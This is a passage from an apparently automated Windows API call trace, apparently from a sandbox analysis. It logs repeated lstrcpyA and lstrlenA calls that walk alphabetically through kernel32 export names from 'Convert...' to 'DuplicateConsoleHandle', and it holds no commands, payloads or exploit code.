lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.952] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.952] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.952] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.952] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.952] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.952] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.952] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.952] lstrlenA (lpString="COPYFILEA") returned 9 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.952] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.952] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.952] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.953] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.953] lstrlenA (lpString="COPYFILEW") returned 9 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.953] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.953] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.953] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.953] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.953] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.953] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.953] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.953] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.953] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.953] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.953] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.953] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.953] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.953] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.953] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.953] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.953] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.954] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.954] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.954] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.954] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.954] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.954] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.954] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.954] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.954] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.954] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.954] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.954] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.954] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.954] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.954] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.954] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.954] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.954] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.954] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.954] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.955] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.955] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.955] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.955] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.955] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.955] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.955] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.955] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.955] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.955] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.955] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.955] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.955] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.955] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.955] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.955] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.955] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.955] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.955] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.956] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.956] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.956] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.956] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.956] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.956] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.956] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.956] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.956] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.956] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.956] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.956] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.956] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.956] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.956] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.956] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.956] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.956] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.956] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.957] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.957] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.957] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.957] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.957] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.957] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.957] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.957] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.957] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.957] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.957] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.957] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.957] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.957] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.957] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.957] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.957] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.957] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.957] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.958] lstrlenA (lpString="DELETEATOM") returned 10 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.958] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.958] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.958] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.958] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.958] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.958] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.958] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.958] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.958] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.958] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.958] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.958] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.958] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.958] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.958] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.958] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.958] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.958] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.958] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.959] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.959] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.959] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.959] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.959] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.959] lstrlenA 